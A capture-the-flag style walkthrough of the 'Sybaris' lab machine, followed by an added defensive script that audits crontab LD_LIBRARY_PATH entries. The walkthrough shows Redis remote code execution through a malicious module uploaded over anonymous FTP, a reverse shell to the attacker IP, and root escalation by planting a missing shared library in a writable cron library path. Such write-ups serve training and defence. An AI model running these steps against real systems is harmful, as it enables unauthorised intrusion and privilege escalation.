Sybaris
Enumeration
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 6 Apr 01 2020 pub [NSE: writeable]
...
6379/tcp open redis Redis key-value store 5.0.9
...
Initial Access
$ redis-cli -h 192.168.71.93
No password is required. We can get a shell with Redis RCE.
https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#load-redis-module
$ git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
$ cd RedisModules-ExecuteCommand
$ make
$ cp module.so ../
ftp> put module.so
We can assume the pub directory sits under the FTP base directory, which is /var/ftp.
$ redis-cli -h 192.168.71.93
192.168.71.93:6379> MODULE LOAD /var/ftp/pub/module.so
OK
192.168.71.93:6379> MODULE LIST
1) 1) "name"
   2) "system"
   3) "ver"
   4) (integer) 1
192.168.71.93:6379> system.exec "whoami"
"pablo\n"
https://www.revshells.com/ - Bash 196 - 192.168.49.71 80 /bin/bash
PrivEsc
Getting a stable shell.
ssh -> pablo:[REDACTED]
A shared library, utils.so, is missing. According to the crontab, there is a writable directory, /usr/local/lib/dev (ref. LD_LIBRARY_PATH). We can use this situation to get a root shell.
Within a minute, we could get a root shell.
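A defender-side check for the condition described above, as an added example that is not part of the original writeup: the hypothetical function audit_cron_libpath reads a crontab file and reports every LD_LIBRARY_PATH entry that is group- or world-writable or does not exist. The crontab and directories used in the demo at the end are constructed.

```shell
#!/bin/sh
# Added example (not from the writeup): flag risky LD_LIBRARY_PATH entries
# defined in a crontab file. audit_cron_libpath is a hypothetical helper name.

audit_cron_libpath() {
    crontab_file=$1
    # Keep only LD_LIBRARY_PATH=... assignment lines, strip trailing blanks,
    # drop quotes, then emit one path entry per line.
    sed -n -e 's/[[:space:]]*$//' \
           -e 's/^[[:space:]]*LD_LIBRARY_PATH[[:space:]]*=[[:space:]]*//p' \
        "$crontab_file" |
    tr -d "\"'" | tr ':' '\n' |
    while IFS= read -r dir; do
        [ -n "$dir" ] || continue
        if [ ! -d "$dir" ]; then
            # A missing entry can be created by anyone who can write to its parent.
            echo "MISSING $dir"
        elif [ -n "$(find "$dir" -prune \( -perm -002 -o -perm -020 \) -print)" ]; then
            # Group- or world-writable: a non-root user can plant a library here.
            echo "WRITABLE $dir"
        fi
    done
}

# Demo on constructed input: one safe directory and one world-writable one.
demo=$(mktemp -d)
mkdir "$demo/lib" "$demo/dev"
chmod 755 "$demo/lib"
chmod 777 "$demo/dev"
printf 'LD_LIBRARY_PATH=%s:%s\n* * * * * root /usr/bin/job\n' \
    "$demo/lib" "$demo/dev" > "$demo/crontab"
audit_cron_libpath "$demo/crontab"
rm -rf "$demo"
```

On a real host, run the function against /etc/crontab and the files in /etc/cron.d. Any WRITABLE or MISSING entry should be fixed by making the directory root-owned with mode 755 or by removing it from the path.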